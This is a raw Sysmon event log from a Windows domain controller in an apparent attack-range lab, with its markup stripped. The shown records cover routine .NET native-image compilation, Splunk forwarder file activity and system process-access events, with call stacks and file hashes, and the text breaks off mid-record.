21:07:03.277{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A277-60D3-5F05-00000000CF01}5600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022976Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.246{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A277-60D3-5F05-00000000CF01}5600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022975Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.246{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A277-60D3-5F05-00000000CF01}5600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022974Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.246{4DB9351A-A276-60D3-5E05-00000000CF01}2036NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\5IUH5P77WT\Microsoft.PowerShell.Editor.ni.dll.auxMD5=DF79C361296328C2E436C1FE5345B005,SHA256=BA79F3A964BA7ED646B83993CFFB8F86B1162CE30C6A567F25ED846D5CFA9E70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022973Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.246{4DB9351A-A276-60D3-5E05-00000000CF01}2036NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\5IUH5P77WT\Microsoft.PowerShell.Editor.ni.dllMD5=42462F8A6D0B5FDA951C0E539C7540A8,SHA256=9A88A00AE22D09CB2DF426D3951F40A4FBC9437C2FA144A3D794562A549B5C32,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000022972Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.027{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=934DB9EC229E4711FC5BA3F786338440,SHA256=4570BF08F3EA15DDD74C529ADA3749F87C80D5929B5522725FC3465CAB2D6332,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022971Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:03.027{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99376E85A17E887632DC6F93DE1E42BC,SHA256=5990CD0193DFADE40B68D52ACD1DF5C80A7C9A5F0A0C81707D52CC9828A84493,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023096Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.980{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A278-60D3-7405-00000000CF01}3980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023095Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.980{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A278-60D3-7405-00000000CF01}3980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023094Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.980{4DB9351A-A278-60D3-7305-00000000CF01}6388NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ZFRQBH3EBZ\Microsoft.Transactions.Bridge.ni.dll.auxMD5=60F0300A5B52F2C5CA42E46FAF33F18E,SHA256=6EBFEDBB1351073E5D15D560CF6981E15422EA5C2E58D9425E4B9C0751129113,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023093Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.980{4DB9351A-A278-60D3-7305-00000000CF01}6388NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ZFRQBH3EBZ\Microsoft.Transactions.Bridge.ni.dllMD5=C544662BFD2C9566266AB23B47A47E57,SHA256=E7B252015CD0FA1FF2B6288BD0133380856293DAE416066B91FE0B5FEDC9E84F,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023092Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.902{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A278-60D3-7305-00000000CF01}6388C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000023091Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.902{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08F27D16FBD5849C094DD1CBAB8B08D2,SHA256=FCDDCCCDCF971C6094B0672CFBAEA553BABD188BA7014232C168A58D06542710,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023090Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.886{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A278-60D3-7305-00000000CF01}6388C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023089Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.886{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A278-60D3-7305-00000000CF01}6388C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023088Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.871{4DB9351A-A278-60D3-7205-00000000CF01}4584NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\NPMNVO2CYU\Microsoft.Tpm.Commands.ni.dll.auxMD5=86B3F44177E9226FE978812F150C0960,SHA256=B1BB393A2E3179365B55AB066E9A14AF1EA3C8911175ADB478A4CC865544F708,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023087Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.871{4DB9351A-A278-60D3-7205-00000000CF01}4584NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\NPMNVO2CYU\Microsoft.Tpm.Commands.ni.dllMD5=A0F9AF5ABA3FD94F5FE745C8543A5D57,SHA256=E478D17FE4469EBD28000D1125F119063C66497A50B121DC7179D9FF07A21F80,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023086Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.855{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=332C8EE5C48904FE33263CE23EDC3CAB,SHA256=4A1663EEB29C9E5FDFF04C2391D4527B7877A8ED0917A7987DDBC1EF4F2E8ED6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023085Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.841{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A278-60D3-7205-00000000CF01}4584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023084Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.824{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000023083Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.824{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x800000000000000023082Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.824{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F695AFC2F70EE4B1159F26CF8FDE580,SHA256=80DB6576A27EFF72FB79C0732945F310BB4DC4208B39888B88F89FF96D9D3573,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023081Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.824{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000023080Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.824{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000023079Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.824{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000023078Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.824{4DB9351A-9F2B-60D3-C500-00000000CF01}4544616C:\Windows\system32\sihost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023077Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.808{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A278-60D3-7205-00000000CF01}4584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023076Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.808{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A278-60D3-7205-00000000CF01}4584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\F